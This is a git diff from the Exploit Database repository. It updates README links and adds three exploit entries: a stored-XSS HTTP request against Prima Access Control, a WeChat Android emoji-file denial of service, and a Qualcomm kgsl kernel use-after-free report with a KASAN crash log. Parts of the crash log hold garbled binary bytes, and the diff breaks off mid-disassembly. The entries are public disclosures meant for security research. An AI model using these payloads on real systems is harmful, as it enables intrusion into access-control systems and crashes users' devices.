diff --git a/README.md b/README.md
index ba9e8228c..e20bd09ee 100644
--- a/README.md
+++ b/README.md
@@ -7,12 +7,12 @@ Our repositories are:
   - Binary Exploits: [https://github.com/offensive-security/exploitdb-bin-sploits](https://github.com/offensive-security/exploitdb-bin-sploits)
   - Papers: [https://github.com/offensive-security/exploitdb-papers](https://github.com/offensive-security/exploitdb-papers)
 
-The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/browse/), [shellcode](https://www.exploit-db.com/shellcode/) and [papers](https://www.exploit-db.com/papers/) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
-You can learn more about the project [here (about)](https://www.exploit-db.com/about-exploit-db/) and [here (history)](https://www.exploit-db.com/history/).
+The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
+You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).
 
 This repository is updated daily with the most recently added submissions. Any additional resources can be found in our [binary exploits repository](https://github.com/offensive-security/exploitdb-bin-sploits).
 
-Exploits are located in the `/exploit/` directory, shellcodes can be found in the `/shellcode/` directory.
+Exploits are located in the [`/exploits/`](https://github.com/offensive-security/exploitdb/tree/master/exploits) directory, shellcodes can be found in the [`/shellcodes/`](https://github.com/offensive-security/exploitdb/tree/master/shellcodes) directory.
 
 - - -
 
@@ -25,7 +25,7 @@ This project (and SearchSploit) is released under "[GNU General Public License v
 # SearchSploit
 
 Included with this repository is the **SearchSploit** utility, which will allow you to search through exploits, shellcodes and papers _(if installed)_ using one or more terms.
-For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
+For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
 
 ## Usage/Example
 
@@ -42,7 +42,7 @@ root@kali:~# searchsploit -h
   searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
   searchsploit linux reverse password
 
-  For more examples, see the manual: https://www.exploit-db.com/searchsploit/
+  For more examples, see the manual: https://www.exploit-db.com/searchsploit
 
 =========
  Options
@@ -62,7 +62,7 @@ root@kali:~# searchsploit -h
        --id                   Display the EDB-ID value rather than local path.
        --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
                                 Use "-v" (verbose) to try even more combinations
-       --exclude="term"       Remove values from results. By using "|" to separated you can chain multiple values.
+       --exclude="term"       Remove values from results. By using "|" to separate, you can chain multiple values.
                                 e.g. --exclude="term1|term2|term3".
 
 =======
@@ -95,7 +95,7 @@ Shellcodes: No Result
 root@kali:~#
 root@kali:~# searchsploit -p 39446
   Exploit: Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
-      URL: https://www.exploit-db.com/exploits/39446/
+      URL: https://www.exploit-db.com/exploits/39446
      Path: /usr/share/exploitdb/exploits/windows_x86/local/39446.py
 File Type: Python script, ASCII text executable, with CRLF line terminators
 
@@ -108,9 +108,9 @@ root@kali:~#
 ## Install
 
 SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work.
-The self updating function will require `git`, and the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
+The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
 
-You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
+You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
 
 **Kali Linux**
 
@@ -128,7 +128,7 @@ root@kali:~# apt -y install exploitdb-bin-sploits exploitdb-papers
 
 **Git**
 
-In short: clone the repository, add the binary into $PATH, and edit the config file to reflect the git path:
+In short: clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
 
 ```
 $ sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb
@@ -138,7 +138,7 @@ $ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
 
 **Homebrew**
 
-If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you setup:
+If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you set up:
 
 ```
 user@MacBook:~$ brew update && brew install exploitdb
diff --git a/exploits/alpha/webapps/47633.txt b/exploits/alpha/webapps/47633.txt
new file mode 100644
index 000000000..fd92ea8c5
--- /dev/null
+++ b/exploits/alpha/webapps/47633.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.3.35
+# Tested on: NA
+# CVE : CVE-2019-7671
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Prima Access Control 2.3.35 Authenticated Stored XSS
+
+# PoC
+
+POST /bin/sysfcgi.fx HTTP/1.1
+Host: 192.168.13.37
+Connection: keep-alive
+Content-Length: 265
+Origin: https://192.168.13.37
+Session-ID: 10127047
+User-Agent: Mozi-Mozi/44.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: text/html, */*; q=0.01
+Session-Pc: 2
+X-Requested-With: XMLHttpRequest
+Referer: https://192.168.13.37/app/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>
\ No newline at end of file
diff --git a/exploits/android/dos/46853.txt b/exploits/android/dos/46853.txt
new file mode 100644
index 000000000..c84ff9660
--- /dev/null
+++ b/exploits/android/dos/46853.txt
@@ -0,0 +1,55 @@
+# Exploit Title: DoS Wechat with an emoji
+# Date: 16-May-2019
+# Exploit Author: Hong Nhat Pham
+# Vendor Homepage: http://www.tencent.com/en-us/index.html
+# Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm
+# Version: 7.0.4
+# Tested on: Android 9.0
+# CVE : CVE-2019-11419
+
+Description:
+vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for
+Android results in a DoS by replacing an emoji file (under the
+/sdcard/tencent/MicroMsg directory) with a crafted .wxgf file.
+Crash-log is provided in poc.zip file at
+https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
+
+Vulnerability Type:
+Denial of Service
+
+Vendor of Product:
+Tencent
+
+Affected Product Code Base:
+WeChat for Android - Up to latest version (7.0.4)
+
+Affected Component:
+Function vcodec2_hls_filter in libvoipCodec_v7a.so
+
+Attack Type:
+Local
+
+Attack vector:
+An malware app can crafts a malicious emoji file and overwrites the
+emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID].
+Once the user opens any chat messages that contain an emoji, WeChat
+will instantly crash.
+
+POC:
+Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
+
+User must have sent or received a GIF file in WeChat
+Malware app must retrieve the phone’s IMEI. For POC, we can use the
+below command
+adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed
+'1 d' | tr -d '.' | awk '{print}' ORS=-
+Produce the malicious emoji file with the retrieved IMEI (use
+encrypt_wxgf.py in poc.zip):
+python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
+Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the
+padded out.wxgf.encrypted
+WeChat will crash now if a message that contains the overwritten emoji file
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip
\ No newline at end of file
diff --git a/exploits/android/dos/46941.txt b/exploits/android/dos/46941.txt
new file mode 100644
index 000000000..c0850b310
--- /dev/null
+++ b/exploits/android/dos/46941.txt
@@ -0,0 +1,295 @@
+The following issue exists in the android-msm-wahoo-4.4-pie branch of
+https://android.googlesource.com/kernel/msm (and possibly others):
+
+When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable
+entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages
+as dirty using the function set_page_dirty(). This function first loads
+page->mapping using page_mapping(), then calls the function pointer
+mapping->a_ops->set_page_dirty.
+
+The bug is that, as explained in upstream commit e92bb4dd9673
+( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),
+the mapping of a page can be freed concurrently unless it is protected somehow
+(e.g. by holding the page lock, or by holding a reference to the mapping).
+For callers who don't hold any such lock or reference, set_page_dirty_lock() is
+provided to safely mark a page as dirty:
+
+==================================
+/*
+ * set_page_dirty() is racy if the caller has no reference against
+ * page->mapping->host, and if the page is unlocked.  This is because another
+ * CPU could truncate the page off the mapping and then free the mapping.
+ *
+ * Usually, the page _is_ locked, or the caller is a user-space process which
+ * holds a reference on the inode by having an open file.
+ *
+ * In other cases, the page should be locked before running set_page_dirty().
+ */
+int set_page_dirty_lock(struct page *page)
+{
+        int ret;
+
+        lock_page(page);
+        ret = set_page_dirty(page);
+        unlock_page(page);
+        return ret;
+}
+==================================
+
+
+To reproduce on a Pixel 2 (walleye):
+
+ - Check out the tree specified above.
+ - Enable KASAN in the kernel config.
+ - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the
+   race window much bigger.
+ - Build and boot the kernel.
+ - Build the attached poc.c with
+   `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
+ - Run the PoC on the device (adb push, then run from adb shell).
+
+You should see a kernel crash like this; note KASAN's report of a UAF in
+set_page_dirty():
+
+==================================
+<6>[  445.698708] c3    688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
+<3>[  447.372706] c3   2621 ==================================================================
+<3>[  447.372963] c3   2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
+<3>[  447.380051] c3   2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
+<3>[  447.387059] c3   2621 
+<4>[  447.394762] c3   2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
+<4>[  447.397158] c3   2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
+<4>[  447.406473] c3   2621 Workqueue: kgsl-mementry _deferred_put
+<4>[  447.418479] c3   2621 Call trace:
+<4>[  447.418660] c3   2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
+<4>[  447.421952] c3   2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
+<4>[  447.428066] c3   2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
+<4>[  447.433965] c3   2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
+<4>[  447.439870] c3   2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
+<4>[  447.447145] c3   2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
+<4>[  447.453407] c3   2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
+<4>[  447.459621] c3   2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
+<4>[  447.465695] c3   2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
+<4>[  447.473017] c3   2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
+<4>[  447.479093] c3   2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
+<4>[  447.485551] c3   2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
+<4>[  447.491801] c3   2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
+<3>[  447.497696] c3   2621 
+<3>[  447.503818] c3   2621 Allocated by task 2684:
+<4>[  447.506206] c3   2621  [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
+<4>[  447.511847] c3   2621  [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
+<4>[  447.517829] c3   2621  [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
+<4>[  447.523494] c3   2621  [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
+<4>[  447.529547] c3   2621  [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
+<4>[  447.534931] c3   2621  [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
+<4>[  447.540572] c3   2621  [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
+<4>[  447.546387] c3   2621  [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
+<4>[  447.552112] c3   2621  [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
+<4>[  447.557318] c3   2621  [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
+<4>[  447.562360] c3   2621  [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
+<4>[  447.568172] c3   2621  [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
+<4>[  447.573556] c3   2621  [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
+<4>[  447.579027] c3   2621  [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
+<4>[  447.584407] c3   2621  [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
+<4>[  447.589787] c3   2621  [<ffffffa689e842b0BCho<D5>
+^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28
+<3>[  447.594909] c3   2621 
+<3>[  447.599065] c3   2621 Freed by task 36:
+<4>[  447.601330] c3   2621  [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
+<4>[  447.606461] c3   2621  [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
+<4>[  447.612450] c3   2621  [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
+<4>[  447.618091] c3   2621  [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
+<4>[  447.623733] c3   2621  [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
+<4>[  447.629363] c3   2621  [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
+<4>[  447.634926] c3   2621  [<ffffffa689ee59a4>] kthread+0x114/0x130
+<4>[  447.640726] c3   2621  [<ffffffa689e84250>] ret_from_fork+0x10/0x40
+<3>[  447.645765] c3   2621 
+<3>[  447.649913] c3   2621 The buggy address belongs to the object at 0000000000000000
+<3>[  447.649913] c3   2621  which belongs to the cache ext4_inode_cache of size 1048
+<3>[  447.652315] c3   2621 The buggy address is located 680 bytes inside of
+<3>[  447.652315] c3   2621  1048-byte region [0000000000000000, 0000000000000000)
+<3>[  447.667170] c3   2621 The buggy address belongs to the page:
+<1>[  447.680933] c3   2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
+<1>[  447.686392] c3   2621 pgd = 0000000000000000
+<1>[  447.695099] c3   2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
+<4>[  447.706506] c3   2621 ------------[ cut here ]------------
+<2>[  447.706664] c3   2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
+<0>[  447.711676] c3   2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
+<4>[  447.719517] c3   2621 Modules linked in:
+<4>[  447.729365] c3   2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
+<4>[  447.729573] c3   2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
+<4>[  447.738760] c3   2621 Workqueue: kgsl-mementry _deferred_put
+<4>[  447.750779] c3   2621 task: 0000000000000000 task.stack: 0000000000000000
+<4>[  447.750972] c3   2621 PC is at el1_sync+0x28/0xe0
+<4>[  447.757719] c3   2621 LR is at dump_page+0x10/0x18
+<4>[  447.762390] c3   2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
+<4>[  447.767106] c3   2621 sp : ffffffd8929b2f60
+<4>[  447.775306] c3   2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 
+<4>[  447.784631] c3   2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 
+<4>[  447.789927] c3   2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 
+<4>[  447.795219] c3   2621 x23: ffffffd892e55500 x22: 0000000000000001 
+<4>[  447.800513] c3   2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 
+<4>[  447.805809] c3   2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a 
+<4>[  447.811105] c3   2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 
+<4>[  447.816400] c3   2621 x15: 0000000000000021 x14: 202c303030303030 
+<4>[  447.821694] c3   2621 x13: 3030303030303030 x12: e95cc056ac940c73 
+<4>[  447.826992] c3   2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 
+<4>[  447.832286] c3   2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 
+<4>[  447.837590] c3   2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 
+<4>[  447.842872] c3   2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 
+<4>[  447.848170] c3   2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 
+<4>[  447.853468] c3   2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 
+<4>[  447.858765] c3   2621 
+<4>[  447.858765] c3   2621 PC: 0xffffffa689e836a8:
+<4>[  447.859009] c3   2621 36a8  d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
+<4>[  447.873684] c3   2621 36c8  a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
+<4>[  447.881847] c3   2621 36e8  a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
+<4>[  447.890005] c3   2621 3708  f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
+<4>[  447.898172] c3   2621 
+<4>[  447.898172] c3   2621 LR: 0xffffffa68a04d99c:
+<4>[  447.898371] c3   2621 d99c  b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
+<4>[  447.91300BCho<D6>
+^@^@<90>^A+^A<98>3<8E><DA>8] c3   2621 d9bc  9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
+<4>[  447.921170] c3   2621 d9dc  a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
+<4>[  447.929328] c3   2621 d9fc  a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
+<4>[  447.937494] c3   2621 
+<4>[  447.937494] c3   2621 SP: 0xffffffd8929b2f20:
+<4>[  447.937693] c3   2621 2f20  8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
+<4>[  447.952331] c3   2621 2f40  00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
+<4>[  447.960491] c3   2621 2f60  214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
+<4>[  447.968651] c3   2621 2f80  c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
+<4>[  447.976809] c3   2621 
+<0>[  447.976941] c3   2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
+<4>[  447.979247] c3   2621 Call trace:
+<4>[  447.987122] c3   2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
+<4>[  447.990662] c3   2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8
+<4>[  447.997788] c3   2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000
+<4>[  448.006468] c3   2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+<4>[  448.015098] c3   2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+<4>[  448.023777] c3   2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+<4>[  448.032461] c3   2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
+<4>[  448.041195] c3   2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00
+<4>[  448.049872] c3   2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000
+<4>[  448.058561] c3   2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
+<4>[  448.067216] c3   2621 2e80: ffffff8b12978008 ffffffd8929fb810
+<4>[  448.075867] c3   2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
+<0>[  448.081787] c3   2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) 
+<4>[  448.087496] c3   2621 ---[ end trace 8d4b2347f8b71fe7 ]---
+<4>[  448.087540] c4   2684 ------------[ cut here ]------------
+<2>[  448.087544] c4   2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
+<0>[  448.087547] c4   2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP
+<4>[  448.087553] c4   2684 Modules linked in:
+<4>[  448.087561] c4   2684 CPU: 4 PID: 2684 Comm: poc Tainted: G      D         4.4.116-gbcd0ecccd040-dirty #45
+<4>[  448.087563] c4   2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
+<4>[  448.087565] c4   2684 task: 0000000000000000 task.stack: 0000000000000000
+<4>[  448.087578] c4   2684 PC is at qlist_free_all+0x3c/0x80
+<4>[  448.087581] c4   2684 LR is at qlist_free_all+0x7c/0x80
+<4>[  448.087585] c4   2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
+<4>[  448.087586] c4   2684 sp : ffffffd87e3b3880
+<4>[  448.087591] c4   2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 
+<4>[  448.087595] c4   2684 x27: 000000000591e848 x26: ffffffd87e3b3920 
+<4>[  448.087598] c4   2684 x25: 0000000000000140 x24: 0000000000000000 
+<4>[  448.087601] c4   2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc 
+<4>[  448.087604] c4   2684 x21: 0000000000000000 x20: ffffffd8929f8040 
+<4>[  448.087607] c4   2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 
+<4>[  448.087611] c4   2684 x17: 000000002c754130 x16: 0000000085837409 
+<4>[  448.087613] c4   2684 x15: 00000000a50d5ad3 x14: 0000000000000000 
+<4>[  448.087617] c4   2684 x13: 0000000001075000 x12: ffffffffffffffff 
+<4>[  448.087620] c4   2684 x11: 0000000000000040 x10: ffffff8b0fc76746 
+<4>[  448.087623] c4   2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b 
+<4>[  448.087626] c4   2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 
+<4>[  448.087629] c4   2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 
+<4>[  448.087632] c4   2684 x3 : fBCho<D7>
+^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000 
+<4>[  448.087635] c4   2684 x1 : dead0000000000ff x0 : 0000000000000000 
+<4>[  448.087637] c4   2684 
+<4>[  448.087637] c4   2684 PC: 0xffffffa68a07bb7c:
+<4>[  448.087646] c4   2684 bb7c  17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
+<4>[  448.087655] c4   2684 bb9c  90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
+<4>[  448.087664] c4   2684 bbbc  b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
+<4>[  448.087673] c4   2684 bbdc  f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
+<4>[  448.087675] c4   2684 
+<4>[  448.087675] c4   2684 LR: 0xffffffa68a07bbbc:
+<4>[  448.087684] c4   2684 bbbc  b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
+<4>[  448.087692] c4   2684 bbdc  f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
+<4>[  448.087701] c4   2684 bbfc  17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
+<4>[  448.087711] c4   2684 bc1c  910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
+<4>[  448.087712] c4   2684 
+<4>[  448.087712] c4   2684 SP: 0xffffffd87e3b3840:
+<4>[  448.087722] c4   2684 3840  8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
+<4>[  448.087731] c4   2684 3860  7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
+<4>[  448.087740] c4   2684 3880  7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
+<4>[  448.087749] c4   2684 38a0  8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
+<4>[  448.087750] c4   2684 
+<0>[  448.087753] c4   2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
+<4>[  448.087754] c4   2684 Call trace:
+<4>[  448.087758] c4   2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
+<4>[  448.087763] c4   2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc
+<4>[  448.087768] c4   2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00
+<4>[  448.087773] c4   2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0
+<4>[  448.087779] c4   2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00
+<4>[  448.087784] c4   2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00
+<4>[  448.087789] c4   2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0
+<4>[  448.087794] c4   2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff
+<4>[  448.087799] c4   2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000
+<4>[  448.087804] c4   2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745
+<4>[  448.087808] c4   2684 37a0: ffffff8b0fc76746 0000000000000040
+<4>[  448.087813] c4   2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80
+<4>[  448.087819] c4   2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0
+<4>[  448.087824] c4   2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4
+<4>[  448.087828] c4   2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
+<4>[  448.087832] c4   2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
+<4>[  448.087840] c4   2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118
+<4>[  448.087844] c4   2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c
+<4>[  448.087848] c4   2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec
+<4>[  448.087851] c4   2684 [<ffffffa68a087930>] finish_open+0x74/0xa8
+<4>[  448.087857] c4   2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404
+<4>[  448.087861] c4   2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
+<4>[  448.087866] c4   2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
+<4>[  448.087869] c4   2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
+<4>[  448.087875] c4   2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
+<0>[  448.087881] c4   2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) 
+<4>[  448.087944] c4   2684 ---[ end trace 8d4DBGC
+==================================
+
+The KASAN report points to instruction 267c in the following assembly:
+
+==================================
+0000000000002630 <set_page_dirty>:
+{
+    2630:       a9bd7bfd        stp     x29, x30, [sp, #-48]!
+    2634:       910003fd        mov     x29, sp
+    2638:       a90153f3        stp     x19, x20, [sp, #16]
+    263c:       f90013f5        str     x21, [sp, #32]
+    2640:       aa0003f3        mov     x19, x0
+        struct address_space *mapping = page_mapping(page);
+    2644:       94000000        bl      0 <page_mapping>
